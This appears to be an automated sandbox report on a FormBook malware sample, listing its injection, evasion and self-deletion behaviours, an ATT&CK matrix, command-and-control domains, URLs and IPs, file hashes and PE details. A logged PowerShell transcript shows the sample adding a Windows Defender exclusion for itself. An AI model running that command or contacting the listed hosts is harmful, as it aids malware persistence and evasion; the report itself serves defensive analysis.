          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 512 | Rootkit 1 | Credential API Hooking 1 | Query Registry 1 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | Input Capture 1 | Security Software Discovery 221 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 11 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Archive Collected Data 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 31 | NTDS | Virtualization/Sandbox Evasion 31 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap |  | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 512 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 2 | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 11 | Proc Filesystem | System Information Discovery 112 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction

          Behavior Graph

          Behavior Graph ID: 510736, Sample: MAPO-PI.exe, Startdate: 28/10/2021, Architecture: WINDOWS, Score: 100

          Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures.

          • MAPO-PI.exe: started MAPO-PI.exe and powershell.exe; dropped C:\Users\user\AppData\...\MAPO-PI.exe.log, ASCII. Signatures: Adds a directory exclusion to Windows Defender; Tries to detect virtualization through RDTSC time measurements.
          • powershell.exe: started conhost.exe.
          • MAPO-PI.exe (child): injected explorer.exe. Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection).
          • explorer.exe: started cmmon32.exe. DNS/IP: www.transforming-leadership.com 159.65.10.143, 49790, 80 DIGITALOCEAN-ASNUS United States; diofis.com 109.232.217.55, 49795, 80 AEROTEK-ASTR Turkey; 3 other IPs or domains. Signature: System process connects to network (likely due to code injection or exploit).
          • cmmon32.exe: started cmd.exe. Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements.
          • cmd.exe: started conhost.exe.

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          MAPO-PI.exe | 31% | Virustotal |
          MAPO-PI.exe | 39% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          3.0.MAPO-PI.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.2.MAPO-PI.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.0.MAPO-PI.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.0.MAPO-PI.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.transforming-leadership.com | 159.65.10.143 | true | true |  | unknown
          lifeinformpodcast.com | 34.102.136.180 | true | false |  | unknown
          diofis.com | 109.232.217.55 | true | true |  | unknown
          www.diofis.com | unknown | unknown | true |  | unknown
          www.lifeinformpodcast.com | unknown | unknown | true |  | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          www.diofis.com/rigx/ | true | Avira URL Cloud: safe | low
          http://www.lifeinformpodcast.com/rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm | false | Avira URL Cloud: safe | unknown
          http://www.transforming-leadership.com/rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 | true | Avira URL Cloud: safe | unknown
          http://www.diofis.com/rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV | true | Avira URL Cloud: safe | unknown

                    URLs from Memory and Binaries

                                • Avira URL Cloud: safe
                                unknown
                                http://www.diofis.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.6cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.diofis.com/hizmetlerimiz/kilo-koruma-beslenme-danismanligi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.diofis.com/2020/11/27/sporcu-beslenmesinde-yeterli-ve-dengeli-beslenmenin-onemi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.diofis.com/hizmetlerimiz/online-beslenme-danismanligi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.diofis.com/#websitecmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.diofis.com/2020/10/24/rahatlatici-cay/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown

                                Contacted IPs


                                Public

                                IP              Domain                           Country        ASN    ASN Name            Malicious
                                34.102.136.180  lifeinformpodcast.com            United States  15169  GOOGLEUS            false
                                159.65.10.143   www.transforming-leadership.com  United States  14061  DIGITALOCEAN-ASNUS  true
                                109.232.217.55  diofis.com                       Turkey         42807  AEROTEK-ASTR        true

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:510736
                                Start date:28.10.2021
                                Start time:07:39:13
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 9m 33s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:MAPO-PI.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:29
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@10/5@3/3
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 9% (good quality ratio 8%)
                                • Quality average: 72.1%
                                • Quality standard deviation: 32%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 84
                                • Number of non-executed functions: 165
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.82.210.154, 23.211.6.115, 23.211.4.86, 20.50.102.62, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.82.209.183
                                • Excluded domains from analysis (whitelisted): www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                Time      Type             Description
                                07:40:04  API Interceptor  1x Sleep call for process: MAPO-PI.exe modified
                                07:40:08  API Interceptor  37x Sleep call for process: powershell.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASN


                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MAPO-PI.exe.log
                                Process:C:\Users\user\Desktop\MAPO-PI.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.355304211458859
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):22216
                                Entropy (8bit):5.605411736270381
                                Encrypted:false
                                SSDEEP:384:itCD3q0uQVhlitckG2mRkSBKn8jultIar7Y9g9SJ3xqT1MaXZlbAV7qWDuZBDI+g:jVr4ckN4K8Clt1v9cQCufwUVW
                                MD5:95B172E74C7587008D47DD07599466DF
                                SHA1:F109393BB49245183CF3EF821B4CF467A99ABB0B
                                SHA-256:9CD70D7F52085B373DD40A8B3B03E568431FBA0DAA51A589D17FCC773438A3FF
                                SHA-512:CAA1486D47A143B23E4731942B6477A338E389EDBD4ABFD49FF7737AC93827BFE384E130E1F04DDEC3CB2D73B7584B77CC1FA952706B65E6389EE08C31A2CE65
                                Malicious:false
                                Reputation:low
                                Preview: @...e...........j.......h...j.^.[.........H..........@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhm0t1yh.nml.psm1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview: 1
                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p05gvjwq.ucq.ps1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview: 1
                                C:\Users\user\Documents\20211028\PowerShell_transcript.855271.6SnYDjtu.20211028074006.txt
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):5707
                                Entropy (8bit):5.381930049255417
                                Encrypted:false
                                SSDEEP:96:BZjS/CN0S3qDo1ZpnRZz/CN0S3qDo1Z+4d+dQdjZW/CN0S3qDo1Zp5dAdAdOZh:fRn
                                MD5:7A5FF84148F6EB95DFAF4DE3120DC911
                                SHA1:D168B38F281F305B45596159FE835682DEE2BF11
                                SHA-256:053633604A80FDB3DFAFFB3D6E2DE3BE2A43F5C21A879683F57B6A74B5069EAA
                                SHA-512:FAD1460ED07176682C12624C401EDF38ED9C068BB0C3BE6C3909526C68E6135EDD04F64C576C79AF8526B1AB922A57566CBC9E10AA63BDCB8BE7D2167D07F43B
                                Malicious:false
                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20211028074007..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 855271 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\MAPO-PI.exe..Process ID: 2592..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211028074007..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\MAPO-PI.exe..**********************..Windows PowerShell transcript start..Start time: 20211028074325..Username: computer\user..RunAs User: computer\user..Configuration

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):6.69902416121267
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:MAPO-PI.exe
                                File size:532992
                                MD5:c619bbbe3c374c8fd3e9f2c26d087496
                                SHA1:a8f7e80f2c8e7687789f2267935610f81bc773d4
                                SHA256:260b61ddee5133e450110555cf0675ad6c015f51e6053c8fdc169db5e01bf993
                                SHA512:754a8e96edeb6c2dc63a7530c7d791b2852cce2a90ee477de446d9ffd9304e8934a8e7088a34127643804c569cf8d40102e8a2c0867f57d6fa6e39cd9cc6b5a2
                                SSDEEP:6144:CR5D/Qa1Hyw3Q3+3pajySWnMTritfg/784KxvFurGagGlkmOv7:2B/Qa1HyT4ajvSeitfWXKxdaWmI7
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ya..............0......D........... ........@.. ....................................@................................

                                File Icon

                                Icon Hash:31b0b4b6b6b6b031

                                Static PE Info

                                General

                                Entrypoint:0x47fb82
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x6179BDEA [Wed Oct 27 21:00:26 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:v4.0.30319
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al

                                Data Directories

                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7fb30 | 0x4f | .text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x80000 | 0x4198 | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0xc | .reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                Sections

                                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x2000 | 0x7db88 | 0x7dc00 | False | 0.683504442097 | data | 6.69285851481 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
